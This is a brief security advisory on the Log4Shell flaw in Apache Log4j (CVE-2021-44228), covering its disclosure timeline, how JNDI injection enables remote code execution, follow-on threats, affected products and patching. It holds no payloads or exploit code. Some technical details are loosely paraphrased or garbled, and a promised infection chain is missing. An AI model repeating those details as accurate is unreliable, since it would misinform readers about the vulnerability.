Overview of the Log4Shell Vulnerability
In the year 2021, a critical vulnerability is being patched in the widely used Java-based logging library, Apache Log4j. Officially named as CVE-2021-44228, this security flaw holds a severity score of 10 out of 10 on the Common Vulnerability Scoring System (CVSS) v3.1 scale.
The vulnerability was initially reported to Apache on November 24, 2021. On December 9, 2021, Log4Shell was publicly disclosed, and a patch was initially applied with version 2.15.0 of Apache Log4j.
Subsequent news regarding attacks occurring in the general environment triggered several national cybersecurity agencies to issue warnings, including the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the UK National Cyber Security Centre (NCSC), and the Canadian Centre for Cyber Security. Due to the popularity of Apache Log4j, millions of devices are at risk.
How Log4Shell Works
Log4Shell is a Java Naming and Directory Interface™ (JNDI) injection vulnerability that allows remote code execution (RCE). An attacker includes untrusted data (such as malicious payloads) in a log message recorded in an affected Apache Log4j version, thereby establishing a connection with a malicious server through JNDI lookup. The result: complete access to your system from anywhere in the world.
Since JNDI lookup supports various directory types like Domain Name Service (DNS), the organization's network devices, Remote Method Invocation (RMI), and Object Request Broker (ORB) Protocol (IIOP) that provide valuable information, Log4Shell has the potential to lead to other threats resembling the following:
Cryptocurrency Mining: Attackers can utilize your resources for cryptocurrency mining. Given the substantial computational power required to run cloud services and applications, this threat can become highly costly.
Distributed Denial of Service (DDoS): This threat enables attackers to effectively shut down and/or disable a network, website, or service so that the targeted organization cannot access it.
Ransomware: After achieving Remote Code Execution (RCE), attackers can gather and encrypt data for the purpose of ransom.
Below is a potential infection chain provided:
Vulnerable Products, Applications, and Plugins
Essentially, any device connected to the internet running Apache Log4j versions 2.0 to 2.14.1. Affected applications include Apache Struts, Apache Solr, Apache Druid, Apache Dubbo, Elasticsearch, and VMware vCenter.
Patching and Mitigation
To address the security vulnerability, Apache initially released Apache Log4j version 2.15.0. However, this version only worked with Java 8. Those using previous versions needed to apply and reapply temporary mitigations. As of the time of writing, Apache has released version 2.16.0 and advised users to promptly update their potentially affected libraries.
Other mitigation strategies, such as virtual patching and the use of Intrusion Detection/Prevention Systems (IDS/IPS), are highly recommended. Virtual patching prevents the exploitation of the vulnerability, while IDS/IPS monitors inbound and outbound traffic for suspicious behavior.
Source: 1.Trend Micro Software Company
2.https://nvd.nist.gov/vuln/detail/CVE-2021-44228
3.https://nvd.nist.gov/vuln/detail/CVE-2021-45046
4.https://nvd.nist.gov/vuln/detail/CVE-2021-45105
